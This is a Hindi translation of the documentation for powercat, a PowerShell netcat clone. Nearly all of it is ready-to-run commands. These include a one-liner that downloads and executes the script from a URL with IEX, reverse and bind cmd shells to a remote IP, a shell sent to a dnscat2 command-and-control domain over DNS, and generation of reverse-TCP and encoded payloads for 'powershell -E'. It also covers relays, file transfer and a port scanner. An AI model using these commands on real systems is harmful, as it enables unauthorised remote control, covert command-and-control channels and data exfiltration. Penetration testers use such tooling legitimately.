
netshell की सभी विशेषताएँ version 2 powershell में
Netcat: पावरशेल संस्करण। (पावरशेल संस्करण 2 और बाद के संस्करण समर्थित)
powercat एक पावरशेल फंक्शन है। पहले आपको इसे निष्पादित करने से पहले फंक्शन को लोड करना होगा। आप नीचे दिए गए कमांडों में से एक को अपने पावरशेल प्रोफाइल में डाल सकते हैं ताकि powercat पावरशेल शुरू होने पर स्वचालित रूप से लोड हो जाए।
डाउनलोड की गई .ps1 फ़ाइल से फंक्शन लोड करें:
. .\powercat.ps1
URL से फंक्शन लोड करें:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
-l एक कनेक्शन सुनें। [Switch]
-c एक श्रोता से कनेक्ट करें। [String]
-p कनेक्ट करने या सुनने के लिए पोर्ट। [String]
-e निष्पादित करें। (GAPING_SECURITY_HOLE) [String]
-ep पावरशेल निष्पादित करें। [Switch]
-r रिले। प्रारूप: "-r tcp:10.1.1.1:443" [String]
-u डेटा को UDP पर स्थानांतरित करें। [Switch]
-dns डेटा को DNS (dnscat2) पर स्थानांतरित करें। [String]
-dnsft DNS विफलता सीमा। [int32]
-t टाइमआउट विकल्प। डिफ़ॉल्ट: 60 [int32]
-i इनपुट: फ़ाइलपथ (स्ट्रिंग), बाइट ऐरे, या स्ट्रिंग। [object]
-o कंसोल आउटपुट प्रकार: "Host", "Bytes", या "String" [String]
-of आउटपुट फ़ाइल पथ। [String]
-d कनेक्ट करने के बाद डिस्कनेक्ट करें। [Switch]
-rep रिपीटर। डिस्कनेक्ट करने के बाद पुनरारंभ करें। [Switch]
-g पेलोड उत्पन्न करें। [Switch]
-ge एन्कोडेड पेलोड उत्पन्न करें। [Switch]
-h सहायता संदेश प्रिंट करें। [Switch]
डिफ़ॉल्ट रूप से, powercat कंसोल से इनपुट पढ़ता है और write-host का उपयोग करके इनपुट को कंसोल पर लिखता है। आप आउटपुट प्रकार को -o के साथ 'Bytes' या 'String' में बदल सकते हैं।
मूल क्लाइंट:
powercat -c 10.1.1.1 -p 443
मूल श्रोता:
powercat -l -p 8000
मूल क्लाइंट, आउटपुट बाइट्स के रूप में:
powercat -c 10.1.1.1 -p 443 -o Bytes
powercat का उपयोग -i (इनपुट) और -of (आउटपुट फ़ाइल) का उपयोग करके फ़ाइलों को आगे-पीछे स्थानांतरित करने के लिए किया जा सकता है।
फ़ाइल भेजें:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
फ़ाइल प्राप्त करें:
powercat -l -p 8000 -of C:\inputfile
powercat का उपयोग शेल भेजने और प्रदान करने के लिए किया जा सकता है। -e के लिए एक निष्पादन योग्य निर्दिष्ट करें, या पावरशेल निष्पादित करने के लिए -ep का उपयोग करें।
cmd शेल प्रदान करें:
powercat -l -p 443 -e cmd
cmd शेल भेजें:
powercat -c 10.1.1.1 -p 443 -e cmd
एक शेल प्रदान करें जो पावरशेल कमांड निष्पादित करता है:
powercat -l -p 443 -ep
powercat TCP पर डेटा भेजने से अधिक का समर्थन करता है। UDP मोड सक्षम करने के लिए -u निर्दिष्ट करें। डेटा को -dns के साथ dnscat2 सर्वर पर भी भेजा जा सकता है। dnscat2 सर्वर चलाते समय "-e open --no-cache" जोड़ना सुनिश्चित करें।
UDP पर डेटा भेजें:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
10.1.1.1 पर DNS सर्वर का उपयोग करके c2.example.com dnscat2 सर्वर से कनेक्ट करें:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
विंडोज में डिफ़ॉल्ट DNS सर्वर का उपयोग करके c2.example.com dnscat2 सर्वर पर एक शेल भेजें:
powercat -dns c2.example.com -e cmd
powercat में रिले पारंपरिक netcat रिले की तरह काम करते हैं, लेकिन आपको कोई फ़ाइल बनाने या दूसरी प्रक्रिया शुरू करने की आवश्यकता नहीं है। आप विभिन्न प्रोटोकॉल के कनेक्शनों के बीच भी डेटा रिले कर सकते हैं।
TCP श्रोता से TCP क्लाइंट रिले:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP श्रोता से UDP क्लाइंट रिले:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP श्रोता से DNS क्लाइंट रिले
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
विंडोज डिफ़ॉल्ट DNS सर्वर का उपयोग करके TCP श्रोता से DNS क्लाइंट रिले
powercat -l -p 8000 -r dns:::c2.example.com
TCP क्लाइंट से क्लाइंट रिले
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP श्रोता से श्रोता रिले
powercat -l -p 8000 -r tcp:9000
विशिष्ट क्रिया करने वाले पेलोड -g (पेलोड उत्पन्न करें) और -ge (एन्कोडेड पेलोड उत्पन्न करें) का उपयोग करके उत्पन्न किए जा सकते हैं। एन्कोडेड पेलोड को powershell -E के साथ निष्पादित किया जा सकता है। यदि आप powercat का पूरा उपयोग नहीं करना चाहते हैं तो आप इनका उपयोग कर सकते हैं।
10.1.1.15 पोर्ट 443 पर वापस कनेक्ट होने वाला रिवर्स tcp पेलोड उत्पन्न करें:
powercat -c 10.1.1.15 -p 443 -e cmd -g
पोर्ट 8000 पर सुनने वाला बाइंड tcp एन्कोडेड कमांड उत्पन्न करें:
powercat -l -p 8000 -e cmd -ge
powercat का उपयोग पोर्ट स्कैन करने और स्थायी सर्वर शुरू करने के लिए भी किया जा सकता है।
बुनियादी TCP पोर्ट स्कैनर:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
एक फ़ाइल प्रदान करने वाला स्थायी सर्वर शुरू करें:
powercat -l -p 443 -i C:\inputfile -rep